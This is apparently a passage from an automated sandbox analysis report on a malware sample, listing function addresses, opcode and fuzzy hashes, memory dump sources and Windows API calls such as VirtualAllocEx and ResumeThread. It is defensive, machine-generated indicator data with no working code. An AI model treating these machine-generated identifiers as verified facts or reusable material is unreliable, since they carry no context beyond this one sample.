                                                            • Instruction ID: fb8f1666a4f35c01719cfa9f53c7a96e05ad533634babd17269c36c9acdd9268
                                                            • Opcode Fuzzy Hash: 9ce5446c417f509bca4255d13c319a40aab81e8d9badb33340aa35234ad0e514
                                                            • Instruction Fuzzy Hash: EB1112B6800349DFDB10CFAAC844ADEFBF4EF88310F10842AD959A7200C379A945CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 070693B8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07069426
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 8e3f29cc1acd898d72b8c513abf0059f4352c877779a9f58fd34b56f9c9c8c09
                                                            • Instruction ID: 47ba6236c8171c3a7895c685f32538ed52b629bb9e7408c1df40ec17c85021db
                                                            • Opcode Fuzzy Hash: 8e3f29cc1acd898d72b8c513abf0059f4352c877779a9f58fd34b56f9c9c8c09
                                                            • Instruction Fuzzy Hash: 101123B1900349DFDF10DFAAC845BDFBBF5AF88320F148819E519A7250C779A950CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07068DF1 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 4684f80eda3120c0ea789ce3d02e083657940a045e4b633bdb96085065d4ff67
                                                            • Instruction ID: d5b4990517049ac23c43c208a4f98bf1d231c5d1d9a730052bdae14e6ea2ca5e
                                                            • Opcode Fuzzy Hash: 4684f80eda3120c0ea789ce3d02e083657940a045e4b633bdb96085065d4ff67
                                                            • Instruction Fuzzy Hash: 561146B1D003498FDB10DFAAC4457DEBBF8AB88624F148419D519A7240CB39A940CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07068DF8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 3cb94b80388c099fc7d2a5cd188174dc247f284a2f3dabb993a44e39cbbf95e2
                                                            • Instruction ID: 60d5d24318c0707b4a05b25ed8db2c54b77f3570a8ca927cc0089e94f5885293
                                                            • Opcode Fuzzy Hash: 3cb94b80388c099fc7d2a5cd188174dc247f284a2f3dabb993a44e39cbbf95e2
                                                            • Instruction Fuzzy Hash: 641136B1900349CFDB10DFAAC4457DFFBF5AF88724F248819D519A7240CB79A944CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0706C138 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0706DF55
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: 3bbd305efc8f136a03828d08bd5fb23c7a0aa79403b2f965b6f63a5efb4edc36
                                                            • Instruction ID: c0aa91ab6185d3aa1b4dd0de41dec27f15002a1d8f032de9d99d2322fc3aaa79
                                                            • Opcode Fuzzy Hash: 3bbd305efc8f136a03828d08bd5fb23c7a0aa79403b2f965b6f63a5efb4edc36
                                                            • Instruction Fuzzy Hash: 5B1133B5900749DFDB10DF8AC488BDFBBF8EB48310F10841AE528A7200C374A944CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010AB020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 010AB086
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102666893.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: fbf594576e4efe436eba9ae1ca811a5bf21d0b0fb105ad0cd6711798b1e9c33d
                                                            • Instruction ID: 77dff6c8b39ddbc68f9bd1934f97854a18d9236d0069fac4566e7fd2a25a6560
                                                            • Opcode Fuzzy Hash: fbf594576e4efe436eba9ae1ca811a5bf21d0b0fb105ad0cd6711798b1e9c33d
                                                            • Instruction Fuzzy Hash: 1411E0B5C00749CFDB20CF9AC444BDEFBF4AB88610F11845AD569B7210D379A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0706DEF0 Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0706DF55
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: c8439d1b7826044e2f502768a3ec76c141febd74faae7946da313026a0f2c356
                                                            • Instruction ID: 6fc4b9b1b7220f35b946f551b3aa7a0980bb0111e78886a75aa500e4dfc43062
                                                            • Opcode Fuzzy Hash: c8439d1b7826044e2f502768a3ec76c141febd74faae7946da313026a0f2c356
                                                            • Instruction Fuzzy Hash: 451142B5904389CFEB00CF99C189BCEFBF4AB48310F20885AE018A7240C378A644CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00ECD3D8 Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102146349.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ecd000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 936ced3e3cc3dfbd316c8a7d338c624ade7a168168068db54fec2ba4a63cef92
                                                            • Instruction ID: f3a97bebd999f4f84205390f78a8f551639663745cadc5b6719c71b39f44e00b
                                                            • Opcode Fuzzy Hash: 936ced3e3cc3dfbd316c8a7d338c624ade7a168168068db54fec2ba4a63cef92
                                                            • Instruction Fuzzy Hash: FE21E271508204EFDB08DF14DAC0F26BB65FB94328F20816DDA095B256C337E857CAA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00EDD01C Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102200116.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_edd000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 75d63edbe7d649a83128aaa1566ee01ae3ebd6383833a0a077d707a20e9c3861
                                                            • Instruction ID: 22dad08b330f43543841198609ec463704d92591a3b23c6bc256a4d2069e936c
                                                            • Opcode Fuzzy Hash: 75d63edbe7d649a83128aaa1566ee01ae3ebd6383833a0a077d707a20e9c3861
                                                            • Instruction Fuzzy Hash: A021D071608204EFDB14DF24D980B26BB66EBC8318F24C56ED90A5B386C33AD847CA61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00EDD1D4 Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102200116.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_edd000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 13ccbadf66a346a74344d57c93411e2cced36ff8a8d3c8965e43dca513056104
                                                            • Instruction ID: 1e35227e51aa30be3b7b6ee706a775f7afcdd24831880df05377eab01c39e599
                                                            • Opcode Fuzzy Hash: 13ccbadf66a346a74344d57c93411e2cced36ff8a8d3c8965e43dca513056104
                                                            • Instruction Fuzzy Hash: 5921F271608204EFDB05DF64D9C0B26BBA5FB84318F20C56EE9095B3A2C336D847CA61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00EDD005 Relevance: .1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102200116.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_edd000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 54f711d76b4230d281fd4c4f2b521b2b34972488c45e850ecf6aa49fd80bab2d
                                                            • Instruction ID: b76998b20a30abe9b7f4df0de1526baa8fe1b47800732e9d7c4e331d356e3388
                                                            • Opcode Fuzzy Hash: 54f711d76b4230d281fd4c4f2b521b2b34972488c45e850ecf6aa49fd80bab2d
                                                            • Instruction Fuzzy Hash: F021717550D3809FC712CF24D990715BF71EB46214F29C5EBD8498B6A7C33A980ACB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00ECD3D3 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102146349.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ecd000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                            • Instruction ID: d0656e9fe9765fc250f0b7d0f4c50487284d218a390f017657bc5ed33ba5c24f
                                                            • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                            • Instruction Fuzzy Hash: A4119D76504240DFCB15CF10DAC4B16BF61FB94324F2486ADD9094A656C33BE85ACBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00EDD1CF Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102200116.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_edd000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                            • Instruction ID: 7f2daffc08d12f7e3b2b4a78c9b9e635538c72d69cc14754b2316e2a87f9d99b
                                                            • Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                            • Instruction Fuzzy Hash: 9E118B75908284DFCB15CF50D9C4B15FBB1FB84318F24C6AAD8494B7A6C33AD85ACB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00ECD745 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102146349.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ecd000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 30df038370749597c4fea13937a37ae5efb8288ea4fefe15ee2b2749a3354016
                                                            • Instruction ID: c49baa474f5e702424035749bbf2ccefd68d3ee8dc5b7926a785d2199f354257
                                                            • Opcode Fuzzy Hash: 30df038370749597c4fea13937a37ae5efb8288ea4fefe15ee2b2749a3354016
                                                            • Instruction Fuzzy Hash: 2001F771008340EAE7105E25CEC4FA6FB98EF41324F14D52FED086A286D27B9842C671
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00ECD744 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102146349.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ecd000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86cdf532b98982a99193c626f3afdb04cd506d51b15214431bb31151bcd21331
                                                            • Instruction ID: aef47ce4f0cff03959485fe6e87fd1acb8f8f43ae7f32c1ee5ea4c2d7e40ed5e
                                                            • Opcode Fuzzy Hash: 86cdf532b98982a99193c626f3afdb04cd506d51b15214431bb31151bcd21331
                                                            • Instruction Fuzzy Hash: 2FF06271409344AEE7108E15CDC4BA2FF98EB91734F18D55AED0C5A286C27A9845CAB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 0706F287 Relevance: .4, Instructions: 411COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 64d142d2a9bbc4e2523d8a32c792e62fa546a0147d02302c1026162a45efbd50
                                                            • Instruction ID: 9b83f9b7836a9186724444f5b9a8b09f0b3dc593f6a85baf2aac3d1b8c1870af
                                                            • Opcode Fuzzy Hash: 64d142d2a9bbc4e2523d8a32c792e62fa546a0147d02302c1026162a45efbd50
                                                            • Instruction Fuzzy Hash: 81D1CEB17013028FEB55EB75D424BAE77F6AF89300F14466AE146DB2A0DF35E901CB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02DB0040 Relevance: .3, Instructions: 315COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2104051173.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2db0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 519f9b534091ca7591c9ecf2edcdfa05b085addf5eabd1eba7bfe981d6f856c0
                                                            • Instruction ID: b679d2b5d29e972a62634b54f90db3241ba291ded9b02867c89af86e6bb095c5
                                                            • Opcode Fuzzy Hash: 519f9b534091ca7591c9ecf2edcdfa05b085addf5eabd1eba7bfe981d6f856c0
                                                            • Instruction Fuzzy Hash: 861272B24117458BE731CF65E94C1A93BB1BB85328F908309D2616F2FADBB8954BCF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 070685D0 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1b238fa42622636978c66c65105eb402631434d522b18fc505eedb5c5dcda0b1
                                                            • Instruction ID: f6cb1515ccb89e32a7584d888e6d2ee31977211035f69f16fcfd70a69233faa8
                                                            • Opcode Fuzzy Hash: 1b238fa42622636978c66c65105eb402631434d522b18fc505eedb5c5dcda0b1
                                                            • Instruction Fuzzy Hash: E9E139B4E002198FDB14DFA8C5949AEFBF2BF89305F24C269D815AB355D730A942CF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07067330 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 88da965e78f668e0c4a5bfa4bb84b8a95c3ceb170a449e3277e9a9e488a85da8
                                                            • Instruction ID: e532f2c49ccb5f832d129d345f9df81d9f1fb36a14ccce2b01491ab9ab4da88e
                                                            • Opcode Fuzzy Hash: 88da965e78f668e0c4a5bfa4bb84b8a95c3ceb170a449e3277e9a9e488a85da8
                                                            • Instruction Fuzzy Hash: D9E11DB4E002198FDB14DFA9C5949AEFBF2FF49305F248269D415A7355D730A942CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07068EA8 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89de51bbd9070fe7ba42f84058e864b142f76d6f80f4eba27ac7e63ce9ead326
                                                            • Instruction ID: 44f6b59856291ef239888d284ae2e2c71860439c46e79038ad9bdafca5b3be12
                                                            • Opcode Fuzzy Hash: 89de51bbd9070fe7ba42f84058e864b142f76d6f80f4eba27ac7e63ce9ead326
                                                            • Instruction Fuzzy Hash: A5E12EB4E102198FDB14DFA8C5949AEFBF2FF89305F248259D415AB355D730A942CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07066EF8 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 916b020c618de788541835fc8c16a0d353285eff49ace27921407676817df976
                                                            • Instruction ID: 2de0b4c9f6f8a142ffdf98bd1033dd25097ea1e6ae4f73c29ec8efa3d1c22f5d
                                                            • Opcode Fuzzy Hash: 916b020c618de788541835fc8c16a0d353285eff49ace27921407676817df976
                                                            • Instruction Fuzzy Hash: 72E11BB4E002198FDB14DFA9C5949AEFBF2FF89305F248259D815AB315D731A941CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07066AC0 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 381e35ede4ce73883406a2126f1f02f49c1a1176461c5ec4c106fdf7d934784d
                                                            • Instruction ID: 7f70da8ba5adc669520a61ca959b5b46aaf574bc2d8eb34b7804271006ef5679
                                                            • Opcode Fuzzy Hash: 381e35ede4ce73883406a2126f1f02f49c1a1176461c5ec4c106fdf7d934784d
                                                            • Instruction Fuzzy Hash: 13E13BB4E002198FDB14DFA9C5949AEFBF2FF89305F248269D415AB315D731A941CF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010ADC74 Relevance: .3, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102666893.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 61e118bf279e976094a1ceedef0e8e4a1fa0928ba0a30aecaf9dffb7f12a62de
                                                            • Instruction ID: 9965bb0bcc6898151d02f3ffa1bac09714bc1d4062a56b287cd43be695676724
                                                            • Opcode Fuzzy Hash: 61e118bf279e976094a1ceedef0e8e4a1fa0928ba0a30aecaf9dffb7f12a62de
                                                            • Instruction Fuzzy Hash: 8DA16D32E0021A8FCF15DFF8C8405DEBBB2FF84300B5585AAE945AB265DB71E955CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02DB0007 Relevance: .2, Instructions: 243COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2104051173.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2db0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f3f8cb878a048768fb8252f555ccc8cd85d004b586463e8b96ddb4f79dee9c45
                                                            • Instruction ID: 02b5bb7efcb47ab88beb3b3ac3f75ff8532bd37e0ade6ed12297f033423d1ecf
                                                            • Opcode Fuzzy Hash: f3f8cb878a048768fb8252f555ccc8cd85d004b586463e8b96ddb4f79dee9c45
                                                            • Instruction Fuzzy Hash: F8D107B28117458FE721CF65E8481A93BB1BB85324F658309D1616F2FADBB8A44FCF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07060620 Relevance: .2, Instructions: 160COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c0e37dc350e0b238e1489b2e1c398f873d4c7e5d96d539d27c36bbadf53b2cce
                                                            • Instruction ID: ec68fffc95e50ae0ac1c80d712d88c53fd6359f88fb2744257304a6430de5237
                                                            • Opcode Fuzzy Hash: c0e37dc350e0b238e1489b2e1c398f873d4c7e5d96d539d27c36bbadf53b2cce
                                                            • Instruction Fuzzy Hash: B961A1B4E052199FCB04DFA9D5909AEFBF2FF89310F24C569D818A7355D630A942CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07065FA0 Relevance: .1, Instructions: 139COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 46aec24ce0150bf26f4f0f63af031078c3f491faf43aa6ab250ffcbe1288c0bf
                                                            • Instruction ID: 6956eb958f788c0c69e4f4a6e774d77e9c59d26bdcf1e936c06d581257e7a2af
                                                            • Opcode Fuzzy Hash: 46aec24ce0150bf26f4f0f63af031078c3f491faf43aa6ab250ffcbe1288c0bf
                                                            • Instruction Fuzzy Hash: EF51F6B4D18219CFDF04DF9AD8585EEFBFABB8A300F149225E429E7211D7329941CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07060611 Relevance: .1, Instructions: 112COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f85a3cff4b045609d2111267b28039105411203c02459542afbc90f4af66a48e
                                                            • Instruction ID: 47a26bb64a7d48d0a6d3f26a5f6fddcad835e6e9d3d1a65ec7657369c139c16b
                                                            • Opcode Fuzzy Hash: f85a3cff4b045609d2111267b28039105411203c02459542afbc90f4af66a48e
                                                            • Instruction Fuzzy Hash: 3A41C8B5E016189FDB48DFAAC980A9EFBF2FF88310F14C569D418A7355DA309946CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:11.5%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:20
                                                            Total number of Limit Nodes:4
                                                            execution_graph 24542 2490848 24544 249084e 24542->24544 24543 249091b 24544->24543 24546 2491380 24544->24546 24548 249138b 24546->24548 24547 2491490 24547->24544 24548->24547 24550 2498250 24548->24550 24551 249825a 24550->24551 24552 2498274 24551->24552 24555 5ddfae8 24551->24555 24559 5ddfad7 24551->24559 24552->24548 24557 5ddfafd 24555->24557 24556 5ddfd12 24556->24552 24557->24556 24558 5ddfd29 GlobalMemoryStatusEx GlobalMemoryStatusEx 24557->24558 24558->24557 24561 5ddfae8 24559->24561 24560 5ddfd12 24560->24552 24561->24560 24562 5ddfd29 GlobalMemoryStatusEx GlobalMemoryStatusEx 24561->24562 24562->24561 24563 2498078 24564 24980be DeleteFileW 24563->24564 24566 24980f7 24564->24566

                                                            Executed Functions

                                                            Function 05DD5658 Relevance: 1.8, Strings: 1, Instructions: 592COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
